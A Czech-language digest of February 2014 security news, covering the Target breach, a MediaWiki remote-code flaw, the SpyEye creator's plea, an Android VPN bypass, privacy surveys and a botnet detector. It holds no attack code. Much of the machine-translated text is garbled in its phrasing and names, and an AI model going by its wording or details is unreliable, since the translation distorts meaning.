Šetření Cíl porušení stále probíhá, a společnost má pochopitelně málomluvný o podrobnostech útoku, ale sdílené , že hackeři byli schopni vstoupit do systému společnosti s využitím pověření ukradené od prodejce. Samozřejmě, že Nezmínil název dodavatele v otázce, a oni neřekli, pro které portál pověření bylo pro, ale to asi není náhoda, že cíl omezený přístup do databáze dodavatelů (Info retrívr) a jejich webové stránky lidských zdrojů (EHR) minulý týden. Do té doby, Brian Krebs byl dělat nějaké jasnozřivostí a byl záplatování dohromady stopy, a je přesvědčen, že útočníci pravděpodobně zjistili, že Target používá určitý kus softwaru, který měl uživatelského účtu správce úroveň s výchozím heslo znát k nim, a zneužila ho nastavit řídicí server v rámci vnitřní sítě cílových tak, aby mohly být shromažďovány ukradené údaje karty v jednom místě, než se dostane exfiltrated. Ten uvádí, že Dell SecureWorks "Counter Threat Unit se také objevil, že jedna složka o malware nainstalován sebe jako službu s názvem "BladeLogic." Název byl zřejmě vybrán napodobovat jméno automatizační software vytvořený BMC, stejná společnost, která prodává software pro správu IT sadu uvedené v předchozím odstavci. Zatímco BMC klesla říci, zda Target používá svůj software, důvěryhodný zdroj potvrdil, Krebs, že mnozí američtí maloobchodníci dělat.
Check Point zjistí kritickou zranitelnost v MediaWiki
8.2.2014 Zranitelnosti
Check Point našel kritickou zranitelnost v MediaWiki projektu webové platformy, populární open source webové platformy používané k vytváření a udržování "wiki" webů. Platforma MediaWiki zahrnuje Wikipedia.org, s více než 94 milionů unikátních návštěvníků měsíčně. Check Point vědci zjistili, že tato kritická zranitelnost vlevo MediaWiki (verze 1.8 a dále) vystaveny ke vzdálenému spuštění kódu (RCE), kde útočník získat úplnou kontrolu nad zranitelný webový server. Tato chyba byla přiřazena CVE-2014-1610 organizace MITRE. K tomu, aby na webu bylo zranitelné, musí být specifické pro ne-výchozí nastavení povoleno v nastavení MediaWiki. Zatímco přesný rozsah dotčených organizací je neznámý, tato chyba zabezpečení byla potvrzena vliv některé z největších známých MediaWiki nasazení na světě. Oni upozornil Wikimedia Foundation o zranitelnosti, a po ověření, Foundation vydala aktualizace a opravy k MediaWiki software. Před dostupnosti patch pro tuto chybu zabezpečení, by útočník mohl podali malware infekce kód do každé stránky na Wikipedia.org, stejně jako do jakékoli jiné vnitřní nebo Web-čelí wiki stránky běží na MediaWiki s postiženými nastavení. Od roku 2006 je to teprve třetí RCE zranitelnost našel na platformě MediaWiki. "Zabere to jen jednu chybu na všeobecně přijaté platformu pro hacker proniknout a způsobit rozsáhlé škody. Check Point Vulnerability Research Group se zaměřuje na zjištění těchto bezpečnostních expozic a zavedení nezbytných real-time ochranu pro zabezpečení Internetu. Jsme rádi, že platforma MediaWiki je nyní chráněn proti útokům na tuto chybu zabezpečení, která by, které představují velké bezpečnostní riziko pro miliony každodenních uživatelů "wiki" na místě, "řekl Dorit Dor, viceprezident pro produkty společnosti Check Point Software Technologies.
Rizikové chování online je uvedení dospívající v nebezpečí
8.2.2014 Bezpečnost
Výzkum McAfee a proti šikaně aliance bylo zjištěno, že 14 - 15 roky staré teenageři jsou s největší pravděpodobností přijmout podstupování rizik chování a overshare on-line, dávat se do potenciálně škodlivých situací a hrozí kybernetické šikany.
Výzkum ukazuje, že 14 až 15 roky a starší koně tráví více času na sociálních médiích, než kterékoli jiné věkové skupiny, s pátým výdaji přes čtyři hodiny přihlášené na každý den. Tito dospívající riziko tvorby sami náchylnější ke zneužívání a šikanování chování digitálně vystavují sdílením příliš mnoho osobních informací on-line, 11% sdílel odhalující videa nebo fotografie ze sebe, 1 v 10 viděl nevhodné, odhalující nebo pornografický obraz někoho, koho vím, on-line a 7% přiznalo "chuti" je nevlídné obraz někoho, koho znají. S 14-15 roky věku takové plodné uživatelů na internetu, to je možná překvapující, že zjištění ukazují, v této věkové skupině jsou uvedení se do potenciálně škodlivých situacích zapojení v nevhodných chování on-line, a jsou s největší pravděpodobností přístup k nebezpečný obsah, být vystaven krutému nebo střední chování a setkat nežádoucí dospělé pozornost. Téměř čtvrtina (23%) z 14 až 15 rok věku dotazovaných viděl porno obrázek online někoho, že nevěděl, a 19% se přiznal k návštěvě webové stránky, které jejich rodiče by neschvaloval. Kromě toho více než polovina 14-15 roky věku dotazovaných také přiznala ke skrytí své online aktivity ze strany rodičů, s téměř čtvrtina (24%) se aktivně mazání jejich historii procházení. Nálezy také ukazují, že děti a mladí lidé zjevně potřebují pomoc, aby pochopili, co je a co není vhodné chování on-line, a rozpoznávat potenciální důsledky svých činů: Přibližně 34% respondentů byli svědky krutého chování on-line, zatímco 22% bylo vystaveno na to sami, polovina z nich připustila, že je opustil pocit rozrušení nebo zlobí. Patnáct procent byl na přijímacím konci faul nebo urážlivé komentáře a 7% bylo řečeno, že se tuk nebo ošklivá. Byl "Tlak vrstevníků" také nejvíce převládající v této věkové skupině, se 19% respondentů připouští, že se vzhlédl sexuální, násilné a další nevhodný obsah, kvůli tlaku od přátel, holka / milenci. Stejná věková skupina vykazovala musí být vedeny on-line na etiketě, aby jasně pochopit rozdíl mezi "škádlení" a šikanu, pouze 23% bylo vidět, že jejich kruté a zneužívající připomínky lze považovat za průměr na osobu na přijímací straně, s-se stejným počtem vidět tyto připomínky jako "jen škádlení." Když to přišlo k cizinec nebezpečí, jeden z deseti (11%), 14 - 15 roky koně byli osloveni dospělé osoby, které neznali on-line. Znepokojující je, že téměř jedna třetina (32%) z těch teenagerů přiblížil se pak sdílené nevhodné věci, jako jsou obrazy samy o sobě s tímto cizincem, který se později litoval. Ještě znepokojivější stále, pětina (20%) uvedlo splnění této dospělá osoba osobně před Uvědomil si, že vztah byl nevhodný. McAfee Cyber Security Expert, Ráj Samani řekl: "Ochrana dětí on-line, je absolutní minové pole, se snadným přístupem na Internet přes chytré telefony , tablety a počítače, rodiče je třeba dosáhnout rovnováhy mezi sociální svobody a bezpečnosti pro dospívající. Tato zpráva upozorňuje na rostoucí potřebu pro rodiče mít upřímné rozhovory se svými dětmi kolem hrozby on-line, čistý etiketu a povahu kybernetické šikany, jakož i zajištění toho, aby domácí zařízení jsou tak účinně zabezpečeny pokud možno z pochybného obsahu. " Luke Roberts, Národní koordinátor pro boj proti šikaně aliance řekl: "Digitální svět je jeden obydlený většinou mladých lidí na denní bázi, ale jsou jasně snaží pochopit, on-line etikety, jaké potřeby on-line chování, nebo jak se udržet v bezpečí. Naše nálezy upozornit na nebezpečí digitální expozice. Ty naznačují, že mladí lidé, zejména mladí teenageři, jsou zobrazeny podstupování rizik chování a volně sdílení informací s tím, co je v podstatě globální, a někdy i anonymní, masové publikum, aniž by chytil trvalost těchto výměn. "Tím, že soukromé informace o veřejný majetek, mladí lidé se vystavují komentovat a pozornost od ostatních, aniž by nutně museli dovednosti pro řešení případných situací, které by mohly vzniknout z těchto on-line interakcí. Jako dospělí, je naší povinností učit děti a mladé lidi, digitální dovednosti a stanovit hranice tak, aby byly schopni realizovat obrovské výhody a příležitosti, které internet nabízí, pokud jde o přístup k informacím a navazování přátelství, ale také zajišťuje, že jsou v bezpečí a bez šikany online i offline. " Výzkum byl pověřen společností McAfee a provádět Atomik výzkum ve Velké Británii. 1012 UK děti ve věku od 10 do 17 a 1013 britských dospělých pacientů s alespoň jedním dítětem ve věku mezi 10 až 17 mezi byly šetřeny. Průzkum byl proveden v říjnu a listopadu 2013.
Angry Birds web poškozeno o "anti-NSA" hacker
7.2.2014 Kriminalita
Oficiální internetové stránky populární Angry Birds hry finské společnosti Rovio byl krátce znetvořil v úterý večer, a byl učiněn na sport na následující obrázek:
Znetvoření byl tak krátký, jak přimět lidi zajímalo, jestli se to opravdu stalo, ale i společnosti a Zone-h.com to potvrdil. Nakonec, místo nebyla ohrožena - útok se ukázalo, že je DNS únos, který z domény přejděte na dvou různých IP adres. "znetvoření byl chycen v minutách a okamžitě opraveny," uvedl Rovio VP Marketing Communications Saara Bergström. "Údaje o koncový uživatel byl bez rizika na jakémkoli místě. Vzhledem k tom, jak Rozlišení jméno internet funguje, pro většinu oblastí nebylo vidět vůbec, ale některé oblasti trvat na správné informace, které mají být aktualizovány." Útok byl proveden hacker, který daboval sám sebe jako "Anti-NSA hackera", a byl zřejmě motivován nedávné zprávě prohlašuje, že USA NSA a UK GCHQ jsou cílené "děravé" telefonní aplikace s cílem shromáždit uživatelská data. Zpráva uváděla, aplikace Angry Birds jménem. Rovio reagovala na něj oficiálně říkat, že oni nejsou "sdílet data, spolupracovat nebo se domluvit s žádnými tajnými vládními jako je NSA nebo GCHQ kdekoli na světě." "údajné sledování může být prováděny prostřednictvím reklamních sítí třetích stran používají miliony komerčních webových stránek a mobilních aplikací ve všech průmyslových odvětvích Pokud reklamních sítí jsou opravdu cílené, zdá se. že žádný internet-umožnil zařízení, které navštíví webové stránky ad povoleny nebo používá aplikace ad povolen je imunní vůči takovým dohledem. Rovio neumožňuje jakékoliv sítě třetí stranou použít nebo předat osobních údajů koncových uživatelů z aplikace Rovio, " uvedl Mikael Hed, generální ředitel společnosti Rovio Entertainment. "V zájmu ochrany našich koncových uživatelů, budeme, stejně jako všechny ostatní společnosti s využitím třetí strany reklamních sítí, musí přehodnotit práci s těmito sítěmi, pokud jsou používány pro špionáž účely.
VPN pass útok možný i na Android Kitkat
7.2.2014 Počítačový útok | Mobil
Bezpečnostní výzkumníci na Ben Gurion University v Izraeli jsou na roli, pokud jde o zjištění Android bezpečnostní nedostatky, a odhalil existenci kritické chyby v nejnovější verzi mobilního operačního systému.
Na konci prosince, publikovali svá zjištění týkající se chyby zabezpečení, které zpočátku věřil být v Samsung Knox architektuře, ale ukázalo se, že Android 4.3 chyba, která dovolila útočníkovi provést útok typu man-in-the-Middle obcházet konfigurace VPN zachytit údaje . V pondělí, sdíleli, že Android 4.4 ("KitKat"), je citlivý na stejný útok (s určitými úpravami). "Zpočátku jsme se nemohli rozmnožovat ji s původním kódem zranitelnosti od KitKat má upravenou implementaci zabezpečení," Výzkumníci uvedeno v blogu . "Po komplikované vyšetřování jsme byli schopni reprodukovat stejnou chybu, kdy škodlivý aplikace může obejít aktivní konfiguraci VPN (bez ROOT oprávnění potřebná) a přesměrovat zabezpečené datové komunikace na jinou adresu sítě. Tyto komunikace jsou zachyceny v CLEAR TEXT (bez šifrování), přičemž tyto informace zcela vystaven. Tento přesměrování může konat při odchodu uživatele zcela lhostejný, věřit, že data jsou šifrována a bezpečné. " Google má, samozřejmě, byl oznámen v obou případech, a výzkumníci pochopitelně jsi 't jít do konkrétní informace o jejich využití nebo zranitelnosti, a že informace nebude sdílet, dokud chyba je opravena. Oni nezmínil, pokud se domnívají, že chyba je využíván ve volné přírodě se zlými úmysly útočníků, takže je to bezpečné předpokládat, nevědí. Samozřejmě, že to neznamená, že tam nejsou.
Mnoho Android aplikace mohou sledovat vaši polohu, přístup k fotografiím
7.2.2014 Mobil
Alarmující podíl Android aplikací můžete najít a otevřít soukromé fotografie na smartphony, umístění uživatelů Track, prozradit e-mailové adresy na internetu a úniku adresáře a telefonní protokoly, podle analýzy 836021 Play Store Android aplikací. Přes 35% z aplikací analyzovaných BitDefender můžete sledovat polohu uživatele, s téměř 3% budou moci získat přístup k umístění, i když je spuštěna aplikace bez vědomí uživatele v pozadí. Více než 6% z těchto aplikací lze také zaslat umístění zařízení přes internet. údaje také ukázaly, že až 3% z aplikací analyzovaných může prozradit e-mailové adresy na internetu: 1749 Nahráno adresu přes šifrované spojení s další 1,661 Přitom přes nešifrované spojení, které by mohly být snadno zachycena. Zjištění zvýšit další obavy s ohledem na odhalení bývalý americký inteligence dodavatele Edward Snowdena, že NSA a GCHQ plánoval extrahovat data z chytrých telefonů uživatelů 'pomocí aplikacích, jako je populární . Angry Birds hra "Naše nejnovější studie ukazují, že většina chytrých telefonů nebo tabletů majitelé mají alespoň jednu aplikaci - a pravděpodobně několik -, které by mohly být použity k sifonu citlivých informací ze svých telefonů," říká Catalin Cosoi, Chief Security stratég BitDefender. " významný podíl žádostí bylo prokázáno, že je schopen prozradit detaily přes internet pomocí nešifrované spojení. S telefony nyní nese větší podobnost s mini počítačů, je obzvláště znepokojující, když vezmete v úvahu obrovské množství vysoce osobních údajů o něčí identity, plán, přátelé, činnosti a práce, které každé zařízení může obsahovat, "dodal Cosoi. Neoprávněné oprávnění může poskytovat přístup k umístění zařízení je, adresáře, telefonní záznamy a geografická data z fotografie nahrané na mobilní verzi stránek sociálních sítí. Facebook a Twitter oba jasné fotky metadat před zveřejněním, ale třetí strana mohla duplikovat informace, jak to cestuje přes mobilní sítě operátora a uloží ji k dalšímu zpracování. To se také může stát, když poskytovatelé reklam třetích stran přijmout data z telefonu použít pro cílené reklamy. V tomto případě je reklamní síť slouží pouze jako vektor. analýza BitDefender také ukázal, že více než 5% z aplikací analyzovaných mohl najít a otevřít fotky na telefonu, s téměř 10%, včetně oprávnění ke čtení seznamy kontaktů. Mnozí z nich mají oprávněnou potřebu těchto údajů, ale jiní jsou jasně dotěrný. Cosoi dodává: "Oprávnění vztahující se k sociálním sítím a senzorů zařízení, jako jsou kamery, mikrofon a GPS, je velmi pravděpodobné, že sběr a vstupy zpráva. Doporučujeme uživatelům neinstalovat takové aplikace, pokud se cítí pohodlně se tato informace přistání v rukou třetí strany.
SpyEye tvůrce přiznává, že
7.2.2014 Viry
Aleksandr Andrejevič Panin, ruský národní známý také jako "Gribodemon" a "Harderman," se přiznal ke spiknutí za účelem spáchání drát a bankovní podvody za jeho roli jako primární vývojář a distributor SpyEye bankovnictví Trojan.
Ovládání z Ruska 2009-2011, Panin spikli s ostatními, včetně codefendant Hamza Bendelladj, alžírský občan také známý jako "BX1," rozvíjet, nabízet a prodávat různé verze viru SpyEye a součásti na internetu. Panin povolené cyber zločinci, jak přizpůsobit své nákupy zařadit na míru metody získávání osobní a finanční údaje obětí, stejně jako verze na trh, které se specificky cílené určených finančních institucí. On inzeroval virus SpyEye na on-line, pozvání pouze trestní fórech, a prodával verze viru SpyEye za ceny v rozmezí od $ 1,000 8,500 dolar. On je věřil, že prodal virus SpyEye alespoň 150 "klientů", kteří, v pořadí , používá je nastavit své vlastní velení a řízení (C & C) servery. Jeden z jeho klientů, "Soldier", údajně z více než 3,2 milionu dolarů v období šesti měsíců s použitím viru SpyEye. V únoru 2011 FBI hledal a chytil SpyEye (C & C) serveru údajně provozuje Bendelladj v severní District of Georgia. Tento server řízený přes 200 počítačů infikovaných virem SpyEye a obsahoval informace z mnoha finančních institucí. V červnu a červenci 2011 FBI skryté zdroje komunikovali přímo s Panin, který byl pomocí své on-line přezdívky "Gribodemon" a "Harderman," o SpyEye virus. Zdroje FBI poté zakoupili verzi SpyEye z Panin, které jsou obsaženy prvky, jejichž cílem je ukrást důvěrné finanční informace, zahájit podvodné on-line bankovní transakce, nainstalujte dřevorubci stisků kláves, a iniciovat distribuované odmítnutí služby útoky z počítačů infikovaných malware. Bendelladj byl zadržen na letišti Suvarnabhumi v Bangkok, Thajsko, na 05.01.2013 a byl vydán z Thajska do Spojených států, 2. května 2013. Jeho náklady jsou v současné době probíhá v severní obvod Gruzie. Panin byl zatčen americkými orgány dne 1. července 2013, když letěl přes Hartsfield-Jackson Atlanta mezinárodní letiště. Šetření také vedlo k zatčení čtyř klientů Panin v SpyEye a společníci ve Spojeném království a Bulharsku. Dne 28.ledna 2014, Panin přiznal ke spiknutí za účelem spáchání drát a bankovní podvody. Odsouzení za Panin je naplánováno na 29.dubna 2014. Podle odhadů průmyslu, virus SpyEye napadl více než 1,4 milionu počítačů ve Spojených státech a do zahraničí, a to byl vynikající malware nástrojů používá od přibližně do roku 2009 do roku 2011. Na základě informací obdržených z odvětví finančních služeb základě, se více než 10.000 bankovní účty byly ohroženy infekcí SpyEye jen od roku 2013. Někteří počítačoví zločinci nadále používat SpyEye dnes, ačkoli jeho účinnost byla omezena, neboť tvůrci softwaru přidali SpyEye programů odstranění škodlivého softwaru.
Spotřebitelé více starat o sběr dat podnikání než státní dozor
7.2.2014 Bezpečnost
TRUSTe vydala své nejnovější USA Index spotřebitelské důvěry, která ukazuje, že vysoký podíl dospělých v USA ve věku 18 let a starší se obávají o své soukromí on-line, on-line důvěra klesá a potenciální dopad na podnikání je stále vysoká.
74 procent uživatelů internetu v USA se více zajímají o ochraně osobních údajů než před rokem a více uživatelů citovat sběr dat podnikání, než vládní programy dozoru, jako důvod pro zvýšení jejich obavy. "I přes veškerou medializaci vládní programy dozoru, jako jako NSA PRISM, více spotřebitelé nadále obávají podniky sběru své informace s pouze 55 procent pravidelně ochotni podělit se o své osobní údaje online. Tyto nálezy vyslat jasný signál, že sběr obchodních údajů, není vláda činnost, je hlavní hnací silou pro zvýšené obavy o soukromí , "řekl Chris Babel, generální ředitel společnosti TRUSTe. "Zatímco některé podniky podnikají kroky dnes řešit otázky ochrany osobních údajů, mnozí nejsou, a bar stoupá." přidal Babel, "Tento výzkum ukazuje, že lidé jsou přesvědčeni, řízení jejich soukromí, ale akce, které se užívají jsou špatné pro podniky což je méně pravděpodobné, že ke kliknutí na reklamy, používat aplikace, nebo povolit umístění sledování na chytré telefony. Společnosti musí jednat nyní na ochranu spotřebitele a jejich osobní údaje, které jsou životně důležité pro úspěch jejich podnikání, a řešení těchto vysokých obavy o ochraně osobních údajů, aby . vytvořit on-line důvěru, minimalizovat rizika a udržet si náskok před konkurencí " Průzkum ukazuje, že:
Obavy spotřebitelů ochrany osobních údajů on-line i nadále vysoká 92 procent amerických uživatelů internetu se nemusíte bát jejich soukromí on-line (až z 89 procent v lednu 2013 a 90 procent v lednu 2012)
Více než polovina uživatelů internetu v USA 55 procent uvedlo, že věří většina podniků s jejich osobním informacím on-line (pokles z 57 procent v lednu 2013 a 59 procent v lednu 2012), a
89 procent spotřebitelů (žádná změna od ledna 2013 až z 88 procent v lednu 2012), uvedl, že vyhnout podnikání s firmami, které nevěří chránit své soukromí na internetu.
TRUSTe 2014 US spotřebitelská důvěra Ochrana Zpráva
vedením on-line Harris Interactive jménem TRUSTe, průzkumu, který probíhal on-line u 2019 dospělých v USA v období mezi prosincem 11-13, 2013, ukazuje, že celkové obavy týkající se soukromí amerických on-line dospělých zůstávají vysoké, 92 procent starosti alespoň někdy o své obecné ochrany soukromí na internetu ve srovnání s 89 procenty v nálezech z podobné studie provedené přes Harris Interactive v lednu 2013. Když američtí uživatelé internetu, kteří se více zajímají o své soukromí on-line, než byly před rokem byli požádáni podrobněji o hlavních příčin obav soukromí, podniky sdílení osobních informací a společnostem sledování online chování na špičce seznamu obav. Konkrétní zjištění patří:
58 procent se obává podniky sdílet své osobní údaje s jinými společnostmi;
47 procent se obává firem sledování jejich online chování je zaměřit se reklamy a obsahu, a to pouze
38 procent uvedeny mediální pokrytí programů vlády USA dozoru jako důvod pro zvýšení zájmu.
Důvěra spotřebitelů se snížila a 70 procent uživatelů internetu v USA cítí jistější o správě jejich soukromí než před rokem a společné akce, které užívají patří:
83 procent je méně pravděpodobné, klikněte na reklamy
80 procent uživatelů chytrých telefonů se zabránilo používání smartphone aplikace, které nevěří chránit jejich soukromí
74 procent uživatelů chytrých telefonů jsou méně pravděpodobné, že k tomu, aby sledování polohy na svém smartphonu.
Kromě těchto akcí, 76 procent spotřebitelů jsou s větší pravděpodobností se podívat na certifikaci ochrany osobních údajů a těsnění na řešení své obavy o ochraně osobních údajů.
IT podceňuje cloud využití app 90%
7.2.2014 IT
Cloud aplikace přijetí se nadále šíří přes prakticky všechny obchodní funkce, od marketingu v oblasti lidských zdrojů. Nicméně, zatímco podnikové aplikace využití se dále roste, Netskope zjistil, že je stále v nevědomosti o jeho využití - v průměru IT profesionálové podceňovat cloud app uplatnění v jejich organizacím 10X, s typickou podniku, který používá 397 aplikací.
Navíc, 77 procent z cloudových aplikací nejsou enterprise-ready, takže IT s výzvou zajištění 10 krát více aplikací, než si mysleli, že je třeba zajistit. Nová zpráva představila nejoblíbenější cloudových aplikací v podniku, jak je definována počtem z různých zasedání app. Twitter vede žebříček a je stále relevantní podniky jako subjekty z oboru marketingu, prodejci, výzkumu a vývoje, a manažeři si sociální média se působivých nástroj. Zatímco populární spotřebitele apps Facebook a LinkedIn také vysoce hodnoceno, oni nedělali top 10. pět nejrozšířenější cloud app kategorie v Netskope Aktivní platformy jsou: Marketing, s 51 cloudových aplikací na podnik, HR s 35 aplikacemi, skladování s 26 aplikace;. a CRM / SFA a spolupráce, s 23 aplikacemi každý Snad nejnápadnější z nich je počet personálních aplikací na podnik. Zatímco HR je široká kategorie, s konkrétními aplikacemi pro dávky, plat, výkon, čas-sledování, a více, v průměru 35 HR aplikace na podnik zvyšuje zabezpečení a dodržování předpisů obavy pro IT profesionály. va také počet Storage aplikací za podnik jako pozoruhodně vysoká na 26 let. Na rozdíl od marketingu a lidských zdrojů, které pokrývají širokou sadu funkcí, skladové aplikace jsou užší oblast působnosti, a mají nadbytečné funkce. Dokonce i organizace, které se rozhodly sjednotit na jedné aplikace pro skladování, jako Dropbox nebo Google disku objevili "dlouhý ocas" z takových aplikací, které jsou nepotrestány, ale v provozu. Mezi nejčastější činnosti v cloud aplikace jsou edit, view, download, post, a podíl. Činnosti, jako je nahrávání, sdílení a stahování patří mezi nejsledovanější, protože může signalizovat únik dat nebo porušení shody. Dnes, většina z porušení zásad vést k "upozornění" akce versus "bloku". K dnešnímu dni, schopnost blokovat konkrétní činnosti v rámci cloudových aplikací je poměrně vznikající na trhu, a IT odborníci jsou nyní začínají balit své paže kolem, které činnosti jsou prováděny předtím, než začnou omezení činnosti.
Kyberzločinci neúspěšně zaútočili na Facebook
7.2.2014 Sociální sítě
Skupině útočníků, známé pod názvem Syrská elektronická armáda (SEA), se podařilo změnit kontaktní informace v doménových registrech na webu facebook.com, změnit adresu webu na jiný server se jim však nepodařilo.
Skupina na Twitteru zveřejnila kopii obrazovky ovládacího panelu společnosti MarkMonitor, jež spravuje doménová jména velkých společností. Zabývá se také ochranou duševního vlastnictví a internetových značek. Služba společnosti, která slouží ke správě domén, podle webu MarkMonitoru „zajišťuje bezpečnost domén posíleným portálem a prémiovým bezpečnostním řešením, včetně pokročilých bezpečnostních opatření na úrovni registrů.“
SEA se podle všeho na MarkMonitor zaměřila právě kvůli útoku na Facebook, který v úterý oslavil své desáté výročí. Skupina použila ovládací panel k úpravě informací WHOIS a kontaktní adresu domény změnila na místo v Syrském Damašku.
Kyberzločincům se však nepodařilo upravit nastavení DNS a server přesměrovat na jiný pod kontrolou SEA, jako se jim to podařilo již u několika webů v minulosti. Facebook totiž používá funkci „zamčení registrů“, která při každé změně doménového jména vyžaduje dodatečné potvrzení člověkem.
To, jak se SEA podařilo panel zpřístupnit, se neví a společnosti MarkMonitor ani Facebook tuto situaci nijak nekomentovaly. Z ostatních snímků, které útočníci zveřejnili, lze poznat, že získali přístup i k doménovým jménům Amazonu, Googlu, Yahoo a dalších známých společností, které však používají stejnou ochranu jako Facebook.
Operace SEA mimo jiné zahrnují také phishing zaměřený na konkrétní zaměstnance společností s cílem získání citlivých informací pomocí sociálního inženýrství. Minulý měsíc se skupině podařilo zveřejnit zprávy na oficiálních blozích Microsoftu a Office poté, co z několika zaměstnanců vymámili přihlašovací údaje k e-mailům.
SEA své schopnosti zneužívá pouze k šíření politických zpráv podporujících syrského prezidenta a vládu, tento druh útoku však může být využit i k zákeřnějším cílům, například ke krádeži údajů či nakažení počítačů malwarem.
Velké firmy zveřejnily detaily spolupráce s NSA
6.2.2014 Bezpečnost
Každého půl roku putovala data z tisícovek uživatelských účtů služeb provozovaných Microsoftem, Googlem, Facebookem a Yahoo k pracovníkům americkým tajných služeb.
Dělo se tak na základě tajného soudního příkazu, který technologickým gigantům současně zakazoval zveřejnit jakékoliv podrobnosti. Americký úřad Ministerstva spravedlnosti však nyní celé čtveřici vyšel vstříc a udělil jim povolení promluvit o určitých detailech jejich spolupráce s Národní bezpečnostní agenturou (NSA) v rámci špehovacího programu PRISM.
Toto povolení má však jistá omezení. Společnosti například smí zveřejnit podrobnosti pouze o datech, která NSA získala na základě příkazu vydaného před více než 6 měsíci.
„Stále si myslíme, že je zapotřebí ještě o trochu více transparentnosti. Jedině tak bude moci každý porozumět tomu, jak fungují příslušné zákony a zda slouží veřejnému zájmu či nikoliv,“ napsal právní ředitel Googlu Richard Salgado na oficiálním blogu. Zejména by prý měly mít společnosti možnost zveřejnit přesné počty žádostí, jejich povahu a počet uživatelé, kterých se nějakým způsobem dotkly.
Zatím jsme se dozvěděli například to, že v období od ledna do června 2013 jen Google předal vládní agentuře metadata až z 999 uživatelských účtů a obsah komunikace 9 000 až 9 999 zákazníků. Microsoft ve stejném období obdržel méně než 1 000 žádostí o záznamy komunikací, do kterých bylo zapojeno 15 000 až 15 999 účtů.
O něco aktivnější muselo být Yahoo, které úřadům za první polovinu loňského roku předalo informace z 30 000 až 30 999 uživatelských účtů. V případě Facebooku byl pak vznesen požadavek na údaje z 5 až 6 tisícovek účtů, přičemž v druhém pololetí roku 2012 to bylo téměř o 1 000 účtů méně.
Společnosti Microsoft, Facebook a Yahoo rovněž formou obsílek obdrželi také několik žádostí od FBI. Na tyto žádosti se však nevztahoval soudní příkaz, takže společnosti nemusejí se zveřejněním informace počkat 6 měsíců. Vím tedy, že za poslední půlrok jen Microsoft obdržel takových obsílek až 999. Facebook, Yahoo, Google, ale i LinkedIn uvedli stejné číslo.
Povolení zveřejnění se však vztahuje pouze na datové žádosti, nikoliv už třeba na záznamy telefonních hovorů. Společnosti proto podle svých slov budou i nadále tlačit na americké úřady, aby je zbavily mlčenlivosti i v těchto dalších případech.
DDoS útok zasáhl české weby
5.2.2014 Počítačový útok
Někteří tuzemští uživatelé se ve středu dopoledne potýkali se zpomalením internetového připojení. Důvodem byl útok typu Distributed Denial of Service (DDoS) na jednoho z největších telekomunikačních poskytovatelů v Česku – společnost GTS Czech. O útoku informoval server Lupa.
„Ve středu jsme zaznamenali útok na naše DNS servery. Probíhal od 8.45 hod. zhruba dvě hodiny,“ řekla Novinkám Lucie Řeřichová, mluvčí společnosti GTS Czech. DNS servery překládají webové adresy na číselné adresy fyzických počítačů (IP adresy).
„DNS platformy byly tímto útokem zpomaleny, nikoli vyřazeny z provozu, a docházelo ke zpoždění v rámci poskytovaných odpovědí na DNS dotazy. Intenzivně pracujeme na řešení problému a implementaci obranných opatření,“ podotkla Řeřichová s tím, že doposud si na problémy stěžovaly dvě desítky zákazníků.
Kybernetickým útokům typu DDoS čelily začátkem března loňského roku také některé tuzemské servery. Směřovány byly nejprve na zpravodajské weby, poté na portál Seznam.cz, servery bank a telefonních operátorů. Bezpečnostní experti v této souvislosti hovořili o největším útoku v historii českého internetu.
Zombie detektor : Half- století - starý nástroj může pomoci vyčenichat botnety , vědci tvrdí,
5.2.2014 BotNety
Statistický nástroj poprvé použit v roce 1966 a v současné době používají v řeči a rozpoznávání gest může držet klíč k popotahování z robotické sítě - tím, že předpovídá pravděpodobný " další krok " z infikovaných počítačů a zdravých počítačů po nich , podle Science Daily .
Výzkumníci z PSG College of Technology , Coimbatore , Indie vyvinula nástroj, který může dělat " zombie " počítače vyčnívat z davu , analýzou jejich činnosti okamžitě - proces, který je často " jako snažit se identifikovat jednu zlatou rybku v obřím akváriem , " podle zprávy Slashdot je .
Tento nástroj používá model skrytých Markov , statistický nástroj, který umožňuje výzkumníkům , aby předpovědi budoucího chování , aniž by věděl o historii minulosti daného systému . Výzkumníci sledovat datové pakety přicházející dovnitř a ven z PC , a používat to , aby se " předpovědi " , jakinfikovaný počítač může chovat , a kontrastující to "normální" chování počítače ve stejném systému . Vědci přirovnávají proces předpovídání počasí . Skryté Markovovy modely , jsou používány značně v rozpoznávání řeči a rozpoznávání gest dnes , ale statistické modely byly poprvé použity v šedesátých letech .
Vědci píší, že "tým použil statistické logiku skrytou modelu semi- Markov předvídat vlastnosti internetové aktivity na daném počítači podezření z toho, žezombie počítače v botnetu ... Tyto proměnné jsou komponenty používané pro řízení tok datových paketů a ven z počítače prostřednictvím internetového protokolu . Jejich přístup může modelovat "normální" chování a pak zvýrazněte aktivit robotické sítě jakoodchylka odnormálu bez konkrétních proměnných, které jsou změněny malware prozatím v očích . "
Vědci píší, že zatímco AV software může odhalit malware , který řídí počítače v botnetu , zločinci jsou neustále přizpůsobuje své techniky , a naznačují, že jejich nástroj může nabídnout způsob, jak " uzamknout " botnety a zombie PC rychle .
V reseachers poukazují na to, že " malware vývojáři se zaměřili v poslední době na web-based , http , typ činnosti, který je jednodušší zamaskovat mezi nesčetnými paketů dat pohybujících se tam a zpět přes síť a do a ven z určitého počítače , " a říkají, že jejich nástroj skrytých Markov nabízí "systém detekce lehký a real-time můžete vidět prostřednictvím tohoto přestrojení snadno . Zavedou-li se široce , jako je systém mohl uzamknout tento druh botnet velmi rychle a zpomalovat vstřebávání zombie počítačů, zločinci a jiní se zlým úmyslem . "
Zpráva Slashdot je poznamená, že identifikace malý počet infikovaných počítačů mezi tisíci může být obtížné - " . Může nabídnout naději " , a že tento nástroj
" Identifikace volání mezi jednotlivými zombie PC a botnet , která ji vlastní , zevnitř společnosti s tisíci počítačových systémů , je jako snažit se identifikovat jednu zlatou rybku mezi tisíci v obřím akváriu : mezi tisíci jinými dělá téměř totéž , je to těžké určit jednu rybu se zlem na jeho mysl , " píše se ve zprávě , " Alepůl století starý statistický nástroj pro analýzu mohou nabídnout větší naději tím, že naznačuje, dost o chování dobře upravených ryb , aby se chování ty špatné vyniknout . "
Příspěvek Zombie detektor : Half- století - starý nástroj může pomoci vyčenichat botnety , vědci tvrdí, objevil se na prvním místě Žijeme zabezpečení .
Slabá hesla a starobylé software opustil údaje vlády USA zranitelné , zpráva DHS najde
5.2.2014 Šifrování
